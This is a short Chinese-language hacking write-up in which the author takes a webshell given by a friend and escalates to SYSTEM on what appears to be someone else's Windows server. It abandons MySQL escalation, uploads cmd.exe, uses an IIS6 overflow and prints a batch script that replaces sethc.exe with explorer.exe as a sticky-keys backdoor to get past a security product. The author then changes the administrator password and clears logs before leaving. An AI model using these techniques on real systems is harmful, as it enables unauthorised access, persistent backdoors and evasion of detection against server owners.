By：永恒

Qq：97245325

今天一朋友给我一个shell。

说要mysql提权。版本是MYSQL版本:5.1.57-

5.0以上的要在mysql目录里才可执行。

可f:/ZkeysSoft/MySql/MySQL Server 5.1/lib/plugin/ 不能创建目录。所以mysql的提权方法不能成功。或许有些大牛可以。

打开shell

 

组建是支持的。说明有希望。

 

不支持。Aspx 那没关系

上传cmd到F:RECYCLERcmd.exe

 

 

可以执行。那就溢出看看吧。

本人喜欢用iis6

 

看到是system的权限。

好吧添加账户看看。

发现添加不成功、

难道是什么东东格挡了？

可以看出是安全狗。安全狗啊。网上都有教程的。那就用sethc.exe来做后门吧。

@echo off 

del /q %systemroot%system32dllcachesethc.exe 

del /q %systemroot%system32sethc.exe 

copy %systemroot%explorer.exe%systemroot%system32sethc.exe 

copy %systemroot%explorer.exe %systemroot%system32dllcachesethc.exe

保持为1.bat

 

执行成功。

连接看看。

 

然后想登陆桌面却不行。用guest要加到administrators组老是不行。

哥生气了。后果很严重。果断把administator管理员密码改了。

 

成功进入。服务器鸡八卡。清除后门。清除日记。然后走人